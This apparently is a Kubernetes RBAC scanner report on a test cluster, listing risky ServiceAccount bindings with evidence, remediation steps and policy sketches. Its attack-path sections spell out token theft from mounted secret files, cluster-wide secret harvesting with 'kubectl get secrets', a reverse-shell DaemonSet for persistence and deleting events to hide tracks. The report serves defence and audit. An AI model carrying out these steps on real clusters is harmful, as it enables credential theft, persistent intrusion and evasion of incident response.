A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any of the workloads using ServiceAccount/rbac-fixtures/sa-wildcard (or finds the token in any storage that touched it: backup, CI logs, a developer's kubeconfig).
  2. They kubectl auth can-i '*' '*' --all-namespaces --token=<stolen-token> and confirm full reach.
  3. They kubectl get secrets -A -o yaml to harvest all credentials cluster-wide (cloud IAM keys, registry pull secrets, application DB passwords, third-party SaaS API keys).
  4. They install a persistent foothold: a DaemonSet using a benign-looking image that runs an attacker reverse-shell on every node, plus a malicious mutating webhook with failurePolicy: Ignore, so the webhook fails open if its backend is ever torn down and the configuration lingers unnoticed.
  5. They cover their tracks by deleting cluster Event objects via kubectl delete events (allowed under */*) and rotating the SA's token to invalidate any copies incident responders already hold.
Remediation
Replace the wildcard binding on ServiceAccount/rbac-fixtures/sa-wildcard with the smallest concrete role that satisfies the workload's actual needs. Treat the existing token as compromised.
  1. Identify the binding: kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == "ServiceAccount" and .name == "sa-wildcard" and .namespace == "rbac-fixtures")'.
  2. Generate a least-privilege role from the workload's actual API calls. Capture them with audit2rbac (https://github.com/liggitt/audit2rbac) over a representative window, or read the operator's source for the API verbs it issues.
  3. Create a Role/ClusterRole with the minimum verbs and bind it to ServiceAccount/rbac-fixtures/sa-wildcard. Verify with kubectl auth can-i for the actual operations the workload needs (and only those).
  4. Delete the wildcard binding and rotate the SA's token (delete and recreate the SA, or rely on projected SA token TTL). Audit-log review for the SA over the last 30 days to gauge possible misuse.
  5. Wire enforcement: a Kyverno cluster policy that fails any RoleBinding/ClusterRoleBinding granting verbs: ['*'] on resources: ['*'] to a non-system subject.
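Step 5 needs admission-time enforcement. Checking the verbs of the role a binding references requires an API lookup from the admission policy, so a complete implementation is more involved than a single pattern; the narrower sketch below only blocks new bindings to cluster-admin itself and is offered as a starting point, not a full replacement for the rule described above.
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: restrict-cluster-admin-bindings    # hypothetical policy name
spec:
  validationFailureAction: Audit           # move to Enforce once legitimate exceptions are mapped
  background: true
  rules:
    - name: block-new-cluster-admin-bindings
      match:
        any:
          - resources:
              kinds:
                - RoleBinding
                - ClusterRoleBinding
      validate:
        message: "Binding cluster-admin is not allowed; bind a scoped Role instead."
        pattern:
          roleRef:
            name: "!cluster-admin"
Catching arbitrary wildcard roles such as cr-wildcard still requires resolving the referenced role's rules (for example with a Kyverno apiCall context) before denying the binding.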
Evidence
Effective rules
* on *
via cr-wildcard (binding crb-wildcard) (cluster scope)
Workloads
Pod/wildcard-app-85ff74597d-pr7l6 in namespace rbac-fixtures
Deployment/wildcard-app in namespace rbac-fixtures
Show raw JSON
{
  "rules": [
    {
      "namespace": "",
      "resources": [
        "*"
      ],
      "source_binding": "crb-wildcard",
      "source_role": "cr-wildcard",
      "verbs": [
        "*"
      ]
    }
  ],
  "workloads": [
    {
      "kind": "Pod",
      "name": "wildcard-app-85ff74597d-pr7l6",
      "namespace": "rbac-fixtures"
    },
    {
      "kind": "Deployment",
      "name": "wildcard-app",
      "namespace": "rbac-fixtures"
    }
  ]
}
CRITICAL

ServiceAccount ServiceAccount/rbac-fixtures/sa-impersonate is mounted by live workloads and has dangerous permissions: impersonate (cluster)

KUBE-SA-PRIVILEGED-002 4 subjects Score 10.0–8.3

Affected subjects (4)

CRITICAL ServiceAccount/rbac-fixtures/sa-impersonate Namespace 10.0
ServiceAccount ServiceAccount/rbac-fixtures/sa-impersonate is mounted by live workloads and has dangerous permissions: impersonate (cluster)
Scope · Namespace ServiceAccount rbac-fixtures/sa-impersonate: namespace-scoped subject; mounted by pods in rbac-fixtures
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-impersonate Resource: ServiceAccount/rbac-fixtures/sa-impersonate

ServiceAccount ServiceAccount/rbac-fixtures/sa-impersonate carries one or more dangerous RBAC capabilities (impersonate (cluster)) *and* is actively mounted by workloads (Pod/rbac-fixtures/imp-app-5f78d6bb9d-xxx8k, Deployment/rbac-fixtures/imp-app). The combination matters: a dangerous permission on an unused SA is latent risk; the same permission on an SA that ships in a running pod is a pre-positioned exploitation primitive. The attacker does not need to find the SA token, because the pod is the SA token.

The flagged capabilities map directly to known privesc paths:
- secrets → read service-account tokens of higher-privileged SAs (KUBE-PRIVESC-005).
- create pods → mount any SA in a new pod, run as root, or set hostPath: / to escape (KUBE-PRIVESC-001, KUBE-ESCAPE-*).
- mutate workloads → modify a Deployment to swap its image / SA, gaining the workload's identity (KUBE-PRIVESC-003).
- bind roles / bind/escalate → grant yourself or any SA arbitrary permissions, cluster-wide (KUBE-PRIVESC-009, KUBE-PRIVESC-010).
- impersonate → assume any user/group/SA, instantly bypassing RBAC (KUBE-PRIVESC-008).
- nodes/proxy → kubelet API access to read all pod logs/exec on a node (KUBE-PRIVESC-012).

Workloads using this SA: Pod/rbac-fixtures/imp-app-5f78d6bb9d-xxx8k, Deployment/rbac-fixtures/imp-app. Each is a starting point: any RCE, any leaked container image layer, any logs accidentally containing the token are equivalent to the SA's RBAC.

Impact Compromise of any workload using ServiceAccount/rbac-fixtures/sa-impersonate immediately grants the listed dangerous capabilities. In practice, this is a one- or two-hop chain to cluster-admin equivalent (see correlated KUBE-PRIVESC-* findings on the same subject).
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any of the workloads (Pod/rbac-fixtures/imp-app-5f78d6bb9d-xxx8k, Deployment/rbac-fixtures/imp-app) via RCE in the application, a malicious image layer, or a leaked manifest with embedded token.
  2. They read /var/run/secrets/kubernetes.io/serviceaccount/token from the pod.
  3. They use the token to invoke the dangerous capabilities (impersonate (cluster)) directly. The token already authenticates as ServiceAccount/rbac-fixtures/sa-impersonate, so no further escalation is needed.
  4. For each capability they convert into the matching privesc path: secrets→token theft → impersonate higher SA; bind→grant self cluster-admin; pods/create→privileged pod with hostPath /.
  5. Within minutes they hold an identity equivalent to the most privileged subject reachable from this SA's chain, typically cluster-admin if any privesc path connects.
Remediation
Split ServiceAccount/rbac-fixtures/sa-impersonate into one SA per workload, remove the dangerous capabilities that aren't actually used, and ensure each workload's SA holds only the minimum verbs.
  1. Audit which of the workloads (Pod/rbac-fixtures/imp-app-5f78d6bb9d-xxx8k, Deployment/rbac-fixtures/imp-app) actually exercises each dangerous capability. Start with audit2rbac over a 7-day window, then ask the workload's owner to confirm.
  2. For each unique workload, create a dedicated SA and a least-privilege Role/ClusterRole with only the verbs that audit2rbac observed. Bind only that Role to the new SA (see the sketch after this list).
  3. Migrate workloads to the new dedicated SA (set spec.serviceAccountName). Delete the bindings against the original ServiceAccount/rbac-fixtures/sa-impersonate and rotate its token.
  4. For capabilities that *no* workload actually exercises, delete the binding entirely.
  5. Wire enforcement: a Kyverno policy that warns when pods.spec.serviceAccountName references an SA whose RBAC binding includes any of [secrets:get, pods:create, rolebindings:create, escalate, impersonate, nodes/proxy:get].
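A minimal sketch of steps 2–3 for imp-app, with the SA name and image as placeholders; the least-privilege Role/RoleBinding from step 2 is then bound to the new SA.
apiVersion: v1
kind: ServiceAccount
metadata:
  name: imp-app-sa                          # hypothetical dedicated SA
  namespace: rbac-fixtures
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: imp-app
  namespace: rbac-fixtures
spec:
  replicas: 1
  selector:
    matchLabels:
      app: imp-app
  template:
    metadata:
      labels:
        app: imp-app
    spec:
      serviceAccountName: imp-app-sa        # replaces sa-impersonate
      automountServiceAccountToken: false   # drop the token entirely unless the app really calls the API
      containers:
        - name: app
          image: registry.example.com/imp-app:1.2.3   # placeholder image
After the rollout is healthy, delete the bindings on sa-impersonate and rotate its token (step 3).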
Evidence
Workloads
Pod/imp-app-5f78d6bb9d-xxx8k in namespace rbac-fixtures
Deployment/imp-app in namespace rbac-fixtures
Dangerous permissions: impersonate (cluster)
Show raw JSON
{
  "dangerous_permissions": [
    "impersonate (cluster)"
  ],
  "workloads": [
    {
      "kind": "Pod",
      "name": "imp-app-5f78d6bb9d-xxx8k",
      "namespace": "rbac-fixtures"
    },
    {
      "kind": "Deployment",
      "name": "imp-app",
      "namespace": "rbac-fixtures"
    }
  ]
}
CRITICAL ServiceAccount/rbac-fixtures/sa-wildcard Namespace 10.0
ServiceAccount ServiceAccount/rbac-fixtures/sa-wildcard is mounted by live workloads and has dangerous permissions: secrets (cluster), create pods (cluster), mutate workloads (cluster), bind roles (cluster), bind/escalate (cluster), impersonate (cluster), nodes/proxy (cluster)
Scope · Namespace ServiceAccount rbac-fixtures/sa-wildcard: namespace-scoped subject; mounted by pods in rbac-fixtures
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-wildcard Resource: ServiceAccount/rbac-fixtures/sa-wildcard

ServiceAccount ServiceAccount/rbac-fixtures/sa-wildcard carries one or more dangerous RBAC capabilities (secrets (cluster), create pods (cluster), mutate workloads (cluster), bind roles (cluster), bind/escalate (cluster), impersonate (cluster), nodes/proxy (cluster)) *and* is actively mounted by workloads (Pod/rbac-fixtures/wildcard-app-85ff74597d-pr7l6, Deployment/rbac-fixtures/wildcard-app). The combination matters: a dangerous permission on an unused SA is latent risk; the same permission on an SA that ships in a running pod is a pre-positioned exploitation primitive. The attacker does not need to find the SA token, because the pod is the SA token.

The flagged capabilities map directly to known privesc paths:
- secrets → read service-account tokens of higher-privileged SAs (KUBE-PRIVESC-005).
- create pods → mount any SA in a new pod, run as root, or set hostPath: / to escape (KUBE-PRIVESC-001, KUBE-ESCAPE-*).
- mutate workloads → modify a Deployment to swap its image / SA, gaining the workload's identity (KUBE-PRIVESC-003).
- bind roles / bind/escalate → grant yourself or any SA arbitrary permissions, cluster-wide (KUBE-PRIVESC-009, KUBE-PRIVESC-010).
- impersonate → assume any user/group/SA, instantly bypassing RBAC (KUBE-PRIVESC-008).
- nodes/proxy → kubelet API access to read all pod logs/exec on a node (KUBE-PRIVESC-012).

Workloads using this SA: Pod/rbac-fixtures/wildcard-app-85ff74597d-pr7l6, Deployment/rbac-fixtures/wildcard-app. Each is a starting point: any RCE, any leaked container image layer, any logs accidentally containing the token are equivalent to the SA's RBAC.

Impact Compromise of any workload using ServiceAccount/rbac-fixtures/sa-wildcard immediately grants the listed dangerous capabilities. In practice, this is a one- or two-hop chain to cluster-admin equivalent (see correlated KUBE-PRIVESC-* findings on the same subject).
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any of the workloads (Pod/rbac-fixtures/wildcard-app-85ff74597d-pr7l6, Deployment/rbac-fixtures/wildcard-app) via RCE in the application, a malicious image layer, or a leaked manifest with embedded token.
  2. They read /var/run/secrets/kubernetes.io/serviceaccount/token from the pod.
  3. They use the token to invoke the dangerous capabilities (secrets (cluster), create pods (cluster), mutate workloads (cluster), bind roles (cluster), bind/escalate (cluster), impersonate (cluster), nodes/proxy (cluster)) directly. The token already authenticates as ServiceAccount/rbac-fixtures/sa-wildcard, so no further escalation is needed.
  4. For each capability they convert into the matching privesc path: secrets→token theft → impersonate higher SA; bind→grant self cluster-admin; pods/create→privileged pod with hostPath /.
  5. Within minutes they hold an identity equivalent to the most privileged subject reachable from this SA's chain, typically cluster-admin if any privesc path connects.
Remediation
Split ServiceAccount/rbac-fixtures/sa-wildcard into one SA per workload, remove the dangerous capabilities that aren't actually used, and ensure each workload's SA holds only the minimum verbs.
  1. Audit which of the workloads (Pod/rbac-fixtures/wildcard-app-85ff74597d-pr7l6, Deployment/rbac-fixtures/wildcard-app) actually exercises each dangerous capability. Start with audit2rbac over a 7-day window, then ask the workload's owner to confirm.
  2. For each unique workload, create a dedicated SA and a least-privilege Role/ClusterRole with only the verbs that audit2rbac observed. Bind only that Role to the new SA.
  3. Migrate workloads to the new dedicated SA (set spec.serviceAccountName). Delete the bindings against the original ServiceAccount/rbac-fixtures/sa-wildcard and rotate its token.
  4. For capabilities that *no* workload actually exercises, delete the binding entirely.
  5. Wire enforcement: a Kyverno policy that warns when pods.spec.serviceAccountName references an SA whose RBAC binding includes any of [secrets:get, pods:create, rolebindings:create, escalate, impersonate, nodes/proxy:get].
Evidence
Workloads
Pod/wildcard-app-85ff74597d-pr7l6 in namespace rbac-fixtures
Deployment/wildcard-app in namespace rbac-fixtures
Dangerous permissions: secrets (cluster) · create pods (cluster) · mutate workloads (cluster) · bind roles (cluster) · bind/escalate (cluster) · impersonate (cluster) · nodes/proxy (cluster)
Show raw JSON
{
  "dangerous_permissions": [
    "secrets (cluster)",
    "create pods (cluster)",
    "mutate workloads (cluster)",
    "bind roles (cluster)",
    "bind/escalate (cluster)",
    "impersonate (cluster)",
    "nodes/proxy (cluster)"
  ],
  "workloads": [
    {
      "kind": "Pod",
      "name": "wildcard-app-85ff74597d-pr7l6",
      "namespace": "rbac-fixtures"
    },
    {
      "kind": "Deployment",
      "name": "wildcard-app",
      "namespace": "rbac-fixtures"
    }
  ]
}
HIGH ServiceAccount/rbac-fixtures/sa-pod-create Namespace 10.0
ServiceAccount ServiceAccount/rbac-fixtures/sa-pod-create is mounted by live workloads and has dangerous permissions: create pods (cluster)
Scope · Namespace ServiceAccount rbac-fixtures/sa-pod-create: namespace-scoped subject; mounted by pods in rbac-fixtures
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-pod-create Resource: ServiceAccount/rbac-fixtures/sa-pod-create

ServiceAccount ServiceAccount/rbac-fixtures/sa-pod-create carries one or more dangerous RBAC capabilities (create pods (cluster)) *and* is actively mounted by workloads (Pod/rbac-fixtures/daemon-app-vwsz7, DaemonSet/rbac-fixtures/daemon-app). The combination matters: a dangerous permission on an unused SA is latent risk; the same permission on an SA that ships in a running pod is a pre-positioned exploitation primitive. The attacker does not need to find the SA token, because the pod is the SA token.

The flagged capabilities map directly to known privesc paths:
- secrets → read service-account tokens of higher-privileged SAs (KUBE-PRIVESC-005).
- create pods → mount any SA in a new pod, run as root, or set hostPath: / to escape (KUBE-PRIVESC-001, KUBE-ESCAPE-*).
- mutate workloads → modify a Deployment to swap its image / SA, gaining the workload's identity (KUBE-PRIVESC-003).
- bind roles / bind/escalate → grant yourself or any SA arbitrary permissions, cluster-wide (KUBE-PRIVESC-009, KUBE-PRIVESC-010).
- impersonate → assume any user/group/SA, instantly bypassing RBAC (KUBE-PRIVESC-008).
- nodes/proxy → kubelet API access to read all pod logs/exec on a node (KUBE-PRIVESC-012).

Workloads using this SA: Pod/rbac-fixtures/daemon-app-vwsz7, DaemonSet/rbac-fixtures/daemon-app. Each is a starting point: any RCE, any leaked container image layer, any logs accidentally containing the token are equivalent to the SA's RBAC.

Impact Compromise of any workload using ServiceAccount/rbac-fixtures/sa-pod-create immediately grants the listed dangerous capabilities. In practice, this is a one- or two-hop chain to cluster-admin equivalent (see correlated KUBE-PRIVESC-* findings on the same subject).
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any of the workloads (Pod/rbac-fixtures/daemon-app-vwsz7, DaemonSet/rbac-fixtures/daemon-app) via RCE in the application, a malicious image layer, or a leaked manifest with embedded token.
  2. They read /var/run/secrets/kubernetes.io/serviceaccount/token from the pod.
  3. They use the token to invoke the dangerous capabilities (create pods (cluster)) directly. The token already authenticates as ServiceAccount/rbac-fixtures/sa-pod-create, so no further escalation is needed.
  4. For each capability they convert into the matching privesc path: secrets→token theft → impersonate higher SA; bind→grant self cluster-admin; pods/create→privileged pod with hostPath /.
  5. Within minutes they hold an identity equivalent to the most privileged subject reachable from this SA's chain, typically cluster-admin if any privesc path connects.
Remediation
Split ServiceAccount/rbac-fixtures/sa-pod-create into one SA per workload, remove the dangerous capabilities that aren't actually used, and ensure each workload's SA holds only the minimum verbs.
  1. Audit which of the workloads (Pod/rbac-fixtures/daemon-app-vwsz7, DaemonSet/rbac-fixtures/daemon-app) actually exercises each dangerous capability. Start with audit2rbac over a 7-day window, then ask the workload's owner to confirm.
  2. For each unique workload, create a dedicated SA and a least-privilege Role/ClusterRole with only the verbs that audit2rbac observed. Bind only that Role to the new SA.
  3. Migrate workloads to the new dedicated SA (set spec.serviceAccountName). Delete the bindings against the original ServiceAccount/rbac-fixtures/sa-pod-create and rotate its token.
  4. For capabilities that *no* workload actually exercises, delete the binding entirely.
  5. Wire enforcement: a Kyverno policy that warns when pods.spec.serviceAccountName references an SA whose RBAC binding includes any of [secrets:get, pods:create, rolebindings:create, escalate, impersonate, nodes/proxy:get].
Evidence
Workloads
Pod/daemon-app-vwsz7 in namespace rbac-fixtures
DaemonSet/daemon-app in namespace rbac-fixtures
Dangerous permissions: create pods (cluster)
Show raw JSON
{
  "dangerous_permissions": [
    "create pods (cluster)"
  ],
  "workloads": [
    {
      "kind": "Pod",
      "name": "daemon-app-vwsz7",
      "namespace": "rbac-fixtures"
    },
    {
      "kind": "DaemonSet",
      "name": "daemon-app",
      "namespace": "rbac-fixtures"
    }
  ]
}
HIGH ServiceAccount/local-path-storage/local-path-provisioner-service-account Namespace 8.3
ServiceAccount ServiceAccount/local-path-storage/local-path-provisioner-service-account is mounted by live workloads and has dangerous permissions: create pods (local-path-storage)
Scope · Namespace ServiceAccount local-path-storage/local-path-provisioner-service-account: namespace-scoped subject; mounted by pods in local-path-storage
Category: Privilege Escalation Subject: ServiceAccount/local-path-storage/local-path-provisioner-service-account Resource: ServiceAccount/local-path-storage/local-path-provisioner-service-account

ServiceAccount ServiceAccount/local-path-storage/local-path-provisioner-service-account carries one or more dangerous RBAC capabilities (create pods (local-path-storage)) *and* is actively mounted by workloads (Pod/local-path-storage/local-path-provisioner-67b8995b4b-klv5x, Deployment/local-path-storage/local-path-provisioner). The combination matters: a dangerous permission on an unused SA is latent risk; the same permission on an SA that ships in a running pod is a pre-positioned exploitation primitive. The attacker does not need to find the SA token, because the pod is the SA token.

The flagged capabilities map directly to known privesc paths:
- secrets → read service-account tokens of higher-privileged SAs (KUBE-PRIVESC-005).
- create pods → mount any SA in a new pod, run as root, or set hostPath: / to escape (KUBE-PRIVESC-001, KUBE-ESCAPE-*).
- mutate workloads → modify a Deployment to swap its image / SA, gaining the workload's identity (KUBE-PRIVESC-003).
- bind roles / bind/escalate → grant yourself or any SA arbitrary permissions, cluster-wide (KUBE-PRIVESC-009, KUBE-PRIVESC-010).
- impersonate → assume any user/group/SA, instantly bypassing RBAC (KUBE-PRIVESC-008).
- nodes/proxy → kubelet API access to read all pod logs/exec on a node (KUBE-PRIVESC-012).

Workloads using this SA: Pod/local-path-storage/local-path-provisioner-67b8995b4b-klv5x, Deployment/local-path-storage/local-path-provisioner. Each is a starting point: any RCE, any leaked container image layer, any logs accidentally containing the token are equivalent to the SA's RBAC.

Impact Compromise of any workload using ServiceAccount/local-path-storage/local-path-provisioner-service-account immediately grants the listed dangerous capabilities. In practice, this is a one- or two-hop chain to cluster-admin equivalent (see correlated KUBE-PRIVESC-* findings on the same subject).
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any of the workloads (Pod/local-path-storage/local-path-provisioner-67b8995b4b-klv5x, Deployment/local-path-storage/local-path-provisioner) via RCE in the application, a malicious image layer, or a leaked manifest with embedded token.
  2. They read /var/run/secrets/kubernetes.io/serviceaccount/token from the pod.
  3. They use the token to invoke the dangerous capabilities (create pods (local-path-storage)) directly. The token already authenticates as ServiceAccount/local-path-storage/local-path-provisioner-service-account, so no further escalation is needed.
  4. For each capability they convert into the matching privesc path: secrets→token theft → impersonate higher SA; bind→grant self cluster-admin; pods/create→privileged pod with hostPath /.
  5. Within minutes they hold an identity equivalent to the most privileged subject reachable from this SA's chain, typically cluster-admin if any privesc path connects.
Remediation
Split ServiceAccount/local-path-storage/local-path-provisioner-service-account into one SA per workload, remove the dangerous capabilities that aren't actually used, and ensure each workload's SA holds only the minimum verbs.
  1. Audit which of the workloads (Pod/local-path-storage/local-path-provisioner-67b8995b4b-klv5x, Deployment/local-path-storage/local-path-provisioner) actually exercises each dangerous capability. Start with audit2rbac over a 7-day window, then ask the workload's owner to confirm.
  2. For each unique workload, create a dedicated SA and a least-privilege Role/ClusterRole with only the verbs that audit2rbac observed. Bind only that Role to the new SA.
  3. Migrate workloads to the new dedicated SA (set spec.serviceAccountName). Delete the bindings against the original ServiceAccount/local-path-storage/local-path-provisioner-service-account and rotate its token.
  4. For capabilities that *no* workload actually exercises, delete the binding entirely.
  5. Wire enforcement: a Kyverno policy that warns when pods.spec.serviceAccountName references an SA whose RBAC binding includes any of [secrets:get, pods:create, rolebindings:create, escalate, impersonate, nodes/proxy:get].
Evidence
Workloads
Pod/local-path-provisioner-67b8995b4b-klv5x in namespace local-path-storage
Deployment/local-path-provisioner in namespace local-path-storage
Dangerous permissions: create pods (local-path-storage)
Show raw JSON
{
  "dangerous_permissions": [
    "create pods (local-path-storage)"
  ],
  "workloads": [
    {
      "kind": "Pod",
      "name": "local-path-provisioner-67b8995b4b-klv5x",
      "namespace": "local-path-storage"
    },
    {
      "kind": "Deployment",
      "name": "local-path-provisioner",
      "namespace": "local-path-storage"
    }
  ]
}
HIGH

ServiceAccount ServiceAccount/rbac-fixtures/sa-pod-create is mounted by a DaemonSet, so its token lives on every node the DaemonSet schedules to

KUBE-SA-DAEMONSET-001 1 subject Score 9.4
MITRE ATT&CK: T1611 · T1552.007 · T1078.004

Affected subject

HIGH ServiceAccount/rbac-fixtures/sa-pod-create Cluster 9.4
ServiceAccount ServiceAccount/rbac-fixtures/sa-pod-create is mounted by a DaemonSet, so its token lives on every node the DaemonSet schedules to
Scope · Cluster ServiceAccount ServiceAccount/rbac-fixtures/sa-pod-create: DaemonSet places its token on every node in the cluster (or every node matching the DaemonSet's nodeSelector)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-pod-create Resource: ServiceAccount/rbac-fixtures/sa-pod-create

ServiceAccount ServiceAccount/rbac-fixtures/sa-pod-create is mounted by a DaemonSet (Pod/rbac-fixtures/daemon-app-vwsz7, DaemonSet/rbac-fixtures/daemon-app). DaemonSets schedule one pod per matching node, so the kubelet projects this SA's token onto every one of those nodes. From an attacker's perspective, that turns any single node compromise (kernel CVE, runtime escape, host-mount-via-misconfigured-pod, malicious workload that escapes its sandbox) into immediate possession of the SA's identity, scaled by node count.

Aggregated rules:
- verbs [create] on resources [pods] (from crb-pod-create/cr-pod-create in cluster-wide)

DaemonSet-mounted SAs are a special case for two reasons:
1. Distribution: a typical cluster has tens to thousands of nodes. A copy of the token is projected onto each one, in /var/lib/kubelet/pods/<uid>/volumes/.... Any node compromise (including ones the security team would normally call "contained to one node") exposes a token for the same SA, and rotating the compromised node's token does not invalidate the copies on the other nodes (until the next re-projection cycle, ~1h with the default token TTL).
2. Privilege: DaemonSets are typically infrastructure agents (logging, monitoring, CNI, CSI, cluster-autoscaler) that legitimately need cluster-wide reads. So the SA tends to carry above-average permissions: nodes:get, pods:list, events:create, sometimes secrets:get for image-pull credentials. Combined with cluster-wide distribution this is a high-leverage credential.

Impact A single node compromise yields a token that authorizes whatever this SA's RBAC says, anywhere in the cluster. With DaemonSet-typical permissions (cluster-wide reads, sometimes node-level controls) this is a fast pivot from one host to cluster-wide visibility/influence.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises one node via a kernel CVE in a tenant workload, an outdated containerd, or a misconfigured pod with hostPath: / they were able to schedule there.
  2. From the host they read /var/lib/kubelet/pods/*/volumes/kubernetes.io~projected/*/token (the projected token of ServiceAccount/rbac-fixtures/sa-pod-create).
  3. They use the token from outside the cluster (kubectl --token=...). The token still works because projection-renewal does not invalidate already-extracted copies until the original expiration.
  4. They use the SA's RBAC for whatever it grants (typically nodes:get, pods:list, secrets:get for image pulls) to locate higher-value targets.
  5. Scale: every node has a copy. Cleanup is per-node, and the team typically only rotates the compromised node's token, leaving the same SA active on all the others.
Remediation
Tighten ServiceAccount/rbac-fixtures/sa-pod-create's RBAC to the literal minimum the DaemonSet needs, set short token TTL (expirationSeconds: 600) on the projected token, and treat the DaemonSet's image and host mounts as part of the SA's effective trust boundary.
  1. Audit ServiceAccount/rbac-fixtures/sa-pod-create's actual API calls with audit2rbac and pare the bindings down to the minimum verbs. Remove any secrets:get unless explicitly required for image pulls.
  2. In the DaemonSet pod template, project the token with expirationSeconds: 600 (10 min) instead of the default 1h (see the projected-volume sketch after this list). This caps the leak window for any single token theft.
  3. Audit the DaemonSet's container image and host mounts: a DaemonSet with hostPath: / is itself an escape primitive. Disallow privileged containers, hostPath, hostPID, hostNetwork in the DaemonSet's PodSpec.
  4. Add per-node detection: alert on kubectl create token <sa> invocations from outside the expected control-plane subjects, and on use of the SA from source IPs outside the pod CIDR.
  5. If the DaemonSet does not actually need an API token, set automountServiceAccountToken: false on its PodSpec and on ServiceAccount/rbac-fixtures/sa-pod-create itself.
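Steps 2 and 5 both live in the DaemonSet's pod template. The fragment below sketches the relevant portion of the DaemonSet spec (other fields unchanged), assuming the agent does need an API token; the volume name is arbitrary and the image is a placeholder.
spec:
  template:
    spec:
      serviceAccountName: sa-pod-create
      automountServiceAccountToken: false          # stop the default 1h projection
      containers:
        - name: agent
          image: registry.example.com/daemon-app:1.0.0   # placeholder image
          volumeMounts:
            - name: short-lived-token
              mountPath: /var/run/secrets/kubernetes.io/serviceaccount
              readOnly: true
      volumes:
        - name: short-lived-token
          projected:
            sources:
              - serviceAccountToken:
                  path: token
                  expirationSeconds: 600           # 10-minute TTL instead of the default 1h
              - configMap:                          # keep ca.crt available for in-cluster clients
                  name: kube-root-ca.crt
                  items:
                    - key: ca.crt
                      path: ca.crt
              - downwardAPI:
                  items:
                    - path: namespace
                      fieldRef:
                        fieldPath: metadata.namespace
If the agent never calls the API at all, omit the projected volume entirely and keep only automountServiceAccountToken: false (step 5).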
Evidence
Effective rules
create on pods
via cr-pod-create (binding crb-pod-create) (cluster scope)
Workloads
Pod/daemon-app-vwsz7 in namespace rbac-fixtures
DaemonSet/daemon-app in namespace rbac-fixtures
Show raw JSON
{
  "rules": [
    {
      "namespace": "",
      "resources": [
        "pods"
      ],
      "source_binding": "crb-pod-create",
      "source_role": "cr-pod-create",
      "verbs": [
        "create"
      ]
    }
  ],
  "workloads": [
    {
      "kind": "Pod",
      "name": "daemon-app-vwsz7",
      "namespace": "rbac-fixtures"
    },
    {
      "kind": "DaemonSet",
      "name": "daemon-app",
      "namespace": "rbac-fixtures"
    }
  ]
}
MEDIUM

Default ServiceAccount vulnerable/default carries explicit RBAC, so every pod that omits serviceAccountName inherits these rights

KUBE-SA-DEFAULT-002 1 subject Score 8.2

Affected subject

MEDIUM ServiceAccount/vulnerable/default Namespace 8.2
Default ServiceAccount vulnerable/default carries explicit RBAC, so every pod that omits serviceAccountName inherits these rights
Scope · Namespace Namespace vulnerable: every Pod that does not set serviceAccountName mounts the default SA's token
Category: Privilege Escalation Subject: ServiceAccount/vulnerable/default Resource: ServiceAccount/vulnerable/default

ServiceAccount vulnerable/default has explicit RBAC bindings. Every Pod created in vulnerable that does not set spec.serviceAccountName is silently bound to this SA, the kubelet projects its token into the pod, and the workload can call kube-apiserver with whatever permissions the bindings grant. Nobody explicitly asked for any of this.

Aggregated rules:
- verbs [get] on resources [configmaps] (from default-sa-rb/cm-reader in vulnerable)

